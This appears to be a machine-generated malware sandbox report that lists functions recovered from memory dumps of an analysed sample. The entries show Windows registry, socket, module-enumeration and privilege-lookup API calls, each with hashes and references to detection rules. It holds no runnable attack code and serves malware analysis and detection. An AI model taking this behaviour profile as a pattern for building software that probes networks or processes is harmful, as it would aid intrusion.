Instruction ID: e13aa076aa45b6ea8fedfe1469bac026a7eebcee996f2ea5e79511ec5630c3e6
Opcode Fuzzy Hash: 085ad533d3bdf7dc4df8315a88133992fd0bb7ca01337e4177273ee60ec39da7
Instruction Fuzzy Hash: CD21B0716003409FEB20CF69DC84B56FBE8EF04310F14846AED458B282D775E944CA71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2AA8C

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a709eff73a2b3bc5239ba4e91494e738b080b1ad41dffb12b89659ea58f6d082
Instruction ID: 361705ba250d6307199e25190c7f24cab99e765b148d6f2d9d4fb90949388c71
Opcode Fuzzy Hash: a709eff73a2b3bc5239ba4e91494e738b080b1ad41dffb12b89659ea58f6d082
Instruction Fuzzy Hash: A9218E72600704AFE721CF15CD84F67FBE8EF05B20F44846AE94A9B656D764F908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AAFB, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DB2AB7E

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: ecb6e2d271c63025c182eda829d861d46af6c166acdab7f4b1dd72a5e90f35e6
Instruction ID: 1a4b4a7d9c6ad336d5f7564655d1e96b91795d0e2309712da65a029a36beabd5
Opcode Fuzzy Hash: ecb6e2d271c63025c182eda829d861d46af6c166acdab7f4b1dd72a5e90f35e6
Instruction Fuzzy Hash: E321A5725497806FD3128B26DC41F72BFB8EF87620F0981DAED848B652D225B915C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 205115C2, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20511634

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 10b50b034c6b0be29418eabb6e8c6d5903382f77b1c75546e0282d0bb799c0ad
Instruction ID: cd354106578c8f625f815ece9c57e61d93d24ed39c232d8b58076b338eadddfc
Opcode Fuzzy Hash: 10b50b034c6b0be29418eabb6e8c6d5903382f77b1c75546e0282d0bb799c0ad
Instruction Fuzzy Hash: 3D218EB1600300AFEB21CF65DC44F96FBA8EF04710F1888AAED459B652D775E948CA75

Uniqueness

Uniqueness Score: -1.00%

Function 20512EA6, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 20512F2A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: ea8bf24012286246c25d55bac07c138ac1685b2f75d498b24adb94658a9e9dea
Instruction ID: 8b204d1e9f14bfa650767338e4b98eca3aaedec720d6c795c0d412bb5346c40d
Opcode Fuzzy Hash: ea8bf24012286246c25d55bac07c138ac1685b2f75d498b24adb94658a9e9dea
Instruction Fuzzy Hash: FA219D764093809FEB228F65D885A92FFF4EF06210F0984DEE9858F163D375A859CB61

Uniqueness

Uniqueness Score: -1.00%

Function 205118DB, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 2051195C

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 8126846bcfc450302f06db3073d707c490eab803b73354b44a47deca5a2c9c55
Instruction ID: a7145b0b1ef71334ddf3a1d6b3de8b4946868fc73de1a51c85c51086dc3661a9
Opcode Fuzzy Hash: 8126846bcfc450302f06db3073d707c490eab803b73354b44a47deca5a2c9c55
Instruction Fuzzy Hash: 252190B14093846FE7128F15DC44B96FFA8EF46320F0884DAE9849B193D265A949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 20512096, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 20512101

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 17e006fefdd53357b02849b426c536b8453efc33eba317b53411621fdcd3508c
Instruction ID: 2092b82b00f26a4526f53acef2fc3cdfc89282059378cde3ebb18e469a9cff28
Opcode Fuzzy Hash: 17e006fefdd53357b02849b426c536b8453efc33eba317b53411621fdcd3508c
Instruction Fuzzy Hash: 4F21AEB1600340AFF721CF69DD85B56FFA8EF08320F14846AEE848B242D775E945CA71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2B5EE

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 8d9e2926a3937e2687915b70f0dd894e7253e7f3301574a9f76e72656bc32245
Instruction ID: 45882ae77e140e24a1200c0453f3936d55a4c6b3fa368f0ab5c0ccbf6e0174de
Opcode Fuzzy Hash: 8d9e2926a3937e2687915b70f0dd894e7253e7f3301574a9f76e72656bc32245
Instruction Fuzzy Hash: 8E1172B25003049FE722CF55DC45F6AFBA8EF44720F44846AED49CB255D674E404CA76

Uniqueness

Uniqueness Score: -1.00%

Function 20511ADE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 20511B4A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: fcb8cbdabc3d04f9a0939f9e7d439a0bf174e4154af936cba29119a45301db73
Instruction ID: ed63908a231947968bd2cd5ed50483c9f7850ea2ca2a5dbad2f5070295899db3
Opcode Fuzzy Hash: fcb8cbdabc3d04f9a0939f9e7d439a0bf174e4154af936cba29119a45301db73
Instruction Fuzzy Hash: 2921CF71504300AFEB21CF65DC44F56FFA4EF04310F1488AEE9858B652E375A804CB65

Uniqueness

Uniqueness Score: -1.00%

Function 20512196, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 2051220A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: e8f3ac28fb59b4ae40767c10c1d49efe5de460f967018f97afbb327d0050ab85
Instruction ID: 849ecca6333607bc46a54af5adefd1e42e65ea34a6ce5d2570bd8cd8d7e619eb
Opcode Fuzzy Hash: e8f3ac28fb59b4ae40767c10c1d49efe5de460f967018f97afbb327d0050ab85
Instruction Fuzzy Hash: 2E219A71500340AFE721CF5ADD84F9AFBE8EF08320F14845EEA848B652D375E948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 20511BA3, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 20511C20

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: b200d07dd75bfb9fd64c7007d80d9c7b5e8ec97c2c1a927f6debe0d2e6fc914f
Instruction ID: a63018613bef349e7e6c1d813bd250079943cc8ce7a2daf49e344b7478121fd1
Opcode Fuzzy Hash: b200d07dd75bfb9fd64c7007d80d9c7b5e8ec97c2c1a927f6debe0d2e6fc914f
Instruction Fuzzy Hash: 962159724093809FDB128F65D944A92BFB4EF07320F0985DAE9848F163D3359959CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20511DFA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20511E6C

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: be2c5ef96aec6d64bb6f7895a96d58d2ada8af6aa90fe40e10971637ab0cffe7
Instruction ID: 459fd22ce4f786769eca64d964997197b3db7d0113b0efa4e39bdb9170e9a965
Opcode Fuzzy Hash: be2c5ef96aec6d64bb6f7895a96d58d2ada8af6aa90fe40e10971637ab0cffe7
Instruction Fuzzy Hash: 6E119D72500304AEEB21CE95DC84F56FFACEF04720F04899AEE459B652D764E948CA75

Uniqueness

Uniqueness Score: -1.00%

Function 20512612, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512671

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: f373fc4ad973b200f7e2a34985772fe6c71b538d4b5aeef33f09adc147b07e36
Instruction ID: 6010545fa765ba09d60a62a7dfa424e251bdddf0630d15a117ab78754e041a29
Opcode Fuzzy Hash: f373fc4ad973b200f7e2a34985772fe6c71b538d4b5aeef33f09adc147b07e36
Instruction Fuzzy Hash: 6B11D372500300AFEB21CF65DD84F56FBA8EF04320F14846AE9448B692D774E854CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2B4FE

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: d68031acad635db38c3a8e8e0a3bbbaf856ce30961c6de226489542e984991f5
Instruction ID: a0d8697ab0b8774fa123592279217e118a6a49943bafc6eaba9bf0b57fb2c225
Opcode Fuzzy Hash: d68031acad635db38c3a8e8e0a3bbbaf856ce30961c6de226489542e984991f5
Instruction Fuzzy Hash: E411C472500300AFEB22CF59DC85B66FBA8EF44720F14846AED498F255D774E404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 20512D26, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512D8A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 4c9ae60b383f6c17541933ee1242eb8f07e84a77850d5844d03469b59938458a
Instruction ID: 10c8732f8a2d810a4df06b7a7b030a6d82b3ae32c913035a639169625fa768d8
Opcode Fuzzy Hash: 4c9ae60b383f6c17541933ee1242eb8f07e84a77850d5844d03469b59938458a
Instruction Fuzzy Hash: C31182B2500304AFE721CF95DD84F96FBACEF44320F14886AE9449B246D674E555CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,DA1DF0F7,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 1DB2A8A8

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8bd2658e58ef34a9d06493355cb5a8d0b56d2bfe9d9ec899f5aa1609db28a2d9
Instruction ID: 51f87086cf6d966f98ef6bf859d68fbbb44e1f568339e8b718b24c6850e943c8
Opcode Fuzzy Hash: 8bd2658e58ef34a9d06493355cb5a8d0b56d2bfe9d9ec899f5aa1609db28a2d9
Instruction Fuzzy Hash: 15216A7140E3C45FD7138B259C94662BFB4DF03224F0980DBED858F1A3D2696909D772

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB2A7F6

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d20c4fb37b87dd7c470fe380fbaa8e1ab22fcb8e4b2c6e755a722e952b6cd3ad
Instruction ID: f9eb1005cc26030c146ff4390dc43515febfc7043850afcfc2d0f6e946ef6d29
Opcode Fuzzy Hash: d20c4fb37b87dd7c470fe380fbaa8e1ab22fcb8e4b2c6e755a722e952b6cd3ad
Instruction Fuzzy Hash: 6E118472409380AFDB228F55DC44B62FFF4EF46210F0884DAED898F562D375A819DB62

Uniqueness

Uniqueness Score: -1.00%

Function 2051106A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 205110C9

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 4bee01f51398eb29d83d60a5555f2649cd6c57dfbdb076fcb6e0a55c44690f4d
Instruction ID: 476d51f9f4672513379e8104eede9407369e4ed6200079179cc9108abb564110
Opcode Fuzzy Hash: 4bee01f51398eb29d83d60a5555f2649cd6c57dfbdb076fcb6e0a55c44690f4d
Instruction Fuzzy Hash: 3411BF72500300AFEB21CF95DC44F56FFA8EF04320F1488AAEA449B256D774E548CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2B27, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c9f0f9d19500bd8fff6e769ffb50ae84901b2c512c7f85ecdf7fa47e0aabe901
Instruction ID: d7116b09cbf2e47dc46f74295cee840aa2ef5e8b275bbd43063025a53ded5532
Opcode Fuzzy Hash: c9f0f9d19500bd8fff6e769ffb50ae84901b2c512c7f85ecdf7fa47e0aabe901
Instruction Fuzzy Hash: 81012DD4B003067EDF653BAC8AE4BAF7661CF97370F50962DFCA196103C6288C865661

Uniqueness

Uniqueness Score: -1.00%

Function 20512A6A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512AC3

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a0e00754f463767f66677d05a76e90e8fc579d84a18e7893eb3e0ef0cc66a5ad
Instruction ID: 7d3eec64153c555da2aefed5fac91c129550243ccb34a0ea8118c65da404c1db
Opcode Fuzzy Hash: a0e00754f463767f66677d05a76e90e8fc579d84a18e7893eb3e0ef0cc66a5ad
Instruction Fuzzy Hash: 3111A0B1504304AFEB21CF59DC84F56FBA8EF04320F14886AED449B246D778E944CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 2051168E, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,DA1DF0F7,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 205116EC

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b98ecfdc5ba81ea2cc404fa9b1c48d1076afc10604c7abddee78c969c3298c09
Instruction ID: f3bf7b50ae406878d09c103236b1df62fa8a80b10d3df95ab8847a1a25bb9069
Opcode Fuzzy Hash: b98ecfdc5ba81ea2cc404fa9b1c48d1076afc10604c7abddee78c969c3298c09
Instruction Fuzzy Hash: 651160755093809FD7128F65DC44B92BFB4DF06220F0984EAED858F263D275A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20512542, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512598

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 70470802238b76e09684171a152793bd42fbd8a262a346f5f8de12e20f77d785
Instruction ID: 34009eea0550995676ab2e53a2d734e622f4fb4712f08db63f1b36513595a35c
Opcode Fuzzy Hash: 70470802238b76e09684171a152793bd42fbd8a262a346f5f8de12e20f77d785
Instruction Fuzzy Hash: C511C2B5500304AFEB21CF55DC84F56FFA8EF04320F1484AAED449F246D678E944CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 20512E0A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512E69

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: aa65ce4092d6c5b0ad8ce6e3ee9df83533e91df70068a1cae7049cce92cb6d5b
Instruction ID: 1e6923d4974943e111f2a4c367b8541343a76b9b6bdc1fb05bd08b4f89591748
Opcode Fuzzy Hash: aa65ce4092d6c5b0ad8ce6e3ee9df83533e91df70068a1cae7049cce92cb6d5b
Instruction Fuzzy Hash: 6611EC72500300AFEB218F55DC84F66FFA8EF08720F14895AEE445B256D374E958CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 20510522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 2051058B

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: df3ba854fedd546abc525285644a285aeef15849f6a6767603818728c1d60866
Instruction ID: f4918d990aba74c9bc090314ec9c09a1f7be16c4497dc219cf98386bb3fbd93c
Opcode Fuzzy Hash: df3ba854fedd546abc525285644a285aeef15849f6a6767603818728c1d60866
Instruction Fuzzy Hash: B111E171500300AFF720DF55DC85FA6FFA8DF05720F14849AEE446B286D2B8E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DB2A0D5

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: bb26401617fc7374c0dd2e25f0a9e218425b071368618ee627c461ff4b8f378f
Instruction ID: 430562edbd170a316a74445cc7bed0de9720ee71d5ef87893b00c750ea122488
Opcode Fuzzy Hash: bb26401617fc7374c0dd2e25f0a9e218425b071368618ee627c461ff4b8f378f
Instruction Fuzzy Hash: 1D119176409380AFDB22CF15DD45B52FFB4EF46224F08849EED898F552D275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A44B, Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1DB2A4AC

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 251efdd82e5207ab909ef6c93ecf3c617ef23e5d14113eb081765f91db47adff
Instruction ID: 723aa2341c5109ff6b81e7181761bf4da75884db5aed9f05898738939fc37503
Opcode Fuzzy Hash: 251efdd82e5207ab909ef6c93ecf3c617ef23e5d14113eb081765f91db47adff
Instruction Fuzzy Hash: 26118F714493C49FD7128F15DC89B52BFB4EF06224F0884DAED898F293D279A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1973, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5dc3070088e979895569a1d567a9ed7d76b1fca38dd529ad76dfdda7fe986ef2
Instruction ID: 8f4f98a8ed7b51b9c4e7c271d3ba2074c5db4169e9a221b4fc40b50be219cb40
Opcode Fuzzy Hash: 5dc3070088e979895569a1d567a9ed7d76b1fca38dd529ad76dfdda7fe986ef2
Instruction Fuzzy Hash: C50178C1B006153DEFF036AC5F95BAF3528CF93734F202619FC20D2143CA6C8889A261

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DB2AD6A

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 841c15d26a3f7b62a8522d7f9a1f8142bdfcaa32c3fa47061e557b1bef3ac1fd
Instruction ID: d4847c368c83469f13decc217bc35c82651e8fb5ac3e861360d184105fafb4a5
Opcode Fuzzy Hash: 841c15d26a3f7b62a8522d7f9a1f8142bdfcaa32c3fa47061e557b1bef3ac1fd
Instruction Fuzzy Hash: D311A1B6A003418FD761CF2AD884757FBE8EF04621F08C46ADD4ACBA56E774E404CA72

Uniqueness

Uniqueness Score: -1.00%

Function 20511906, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 2051195C

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: bb7304af0efa867a3507bad4286d3f7f0edb4349b4efce29c10b3e9b93965d40
Instruction ID: 1a54a41090c49904196a02ff8e66a633d0a98a203ceb22e8c527d5ea5a099554
Opcode Fuzzy Hash: bb7304af0efa867a3507bad4286d3f7f0edb4349b4efce29c10b3e9b93965d40
Instruction Fuzzy Hash: 8401D671500304AFEB21CF56DC85F66FFA8EF44720F14849AED449B246D778E944CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 20510EDA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20510F2D

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 248163488980dc0c1573c0f2472c937d7d68c6535e81e4e72499b551fdd27226
Instruction ID: b0f7c695f4a1a40f62dddf34bcff62c959621ba9ab5b60de66122ee605b84090
Opcode Fuzzy Hash: 248163488980dc0c1573c0f2472c937d7d68c6535e81e4e72499b551fdd27226
Instruction Fuzzy Hash: EB01D671500304AEE721CF55DC85F56FF98DF04720F148456ED449B246D7B8E949CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 20512EDE, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 20512F2A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 13a7ec959342bc5611416b5d67187f642be470df5081f63d155eafb777171178
Instruction ID: 1a827e9741481d7fad0031f45999d17eb45ded80adf1b594322ee9eab2d590d0
Opcode Fuzzy Hash: 13a7ec959342bc5611416b5d67187f642be470df5081f63d155eafb777171178
Instruction Fuzzy Hash: F0115E715007009FEB21CF95D885B52FFF4EF04220F0889AAED498B662D375E859DF61

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DB2B6FA

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 8617657406bc1abef2eb3913a51073f3a425dc2cecb5be81f589d9ac487db94d
Instruction ID: 038148f46c64a2a0695d5237a629d0bc4431e67dc3c151cd17edc87f2ab777ac
Opcode Fuzzy Hash: 8617657406bc1abef2eb3913a51073f3a425dc2cecb5be81f589d9ac487db94d
Instruction Fuzzy Hash: 7A017171500600AFD714DF1ADC85B26FBA8EF89B20F14856AED089B641E231F916CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A172, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000EB4,?,?), ref: 1DB2A1C2

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 505756fbc712ecdef1bc31199d6e524a9bcb27972dd139f478de40bea738759b
Instruction ID: 053f6c531b8ee1a102e09115cef05c4fe45d4d8446bedecff7609d570095388d
Opcode Fuzzy Hash: 505756fbc712ecdef1bc31199d6e524a9bcb27972dd139f478de40bea738759b
Instruction Fuzzy Hash: 87017171500600AFD714DF1ADC85B26FBA8EF89A20F14856AED089B641E235F916CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB2A7F6

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 52a9d4a27a687042044dca3ea6e3cc46e3646e60c84550478943bdc4815e7145
Instruction ID: 701e67446c9f78f940ca267d44ab7df9677f458a8228914032a960da524736a1
Opcode Fuzzy Hash: 52a9d4a27a687042044dca3ea6e3cc46e3646e60c84550478943bdc4815e7145
Instruction Fuzzy Hash: 98016D324007409FDB218F55D944B66FFE0EF08720F08C8AADE894B656E375E419DF62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DB2AB7E

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: cac60fe6e372af452a30112070dcf9c233e998fa36ee904673f7613c3acf4c20
Instruction ID: aef4fd17e49d28f4eeeac17840251ccb8335007f7fd09cb6b412bf3be8a1005a
Opcode Fuzzy Hash: cac60fe6e372af452a30112070dcf9c233e998fa36ee904673f7613c3acf4c20
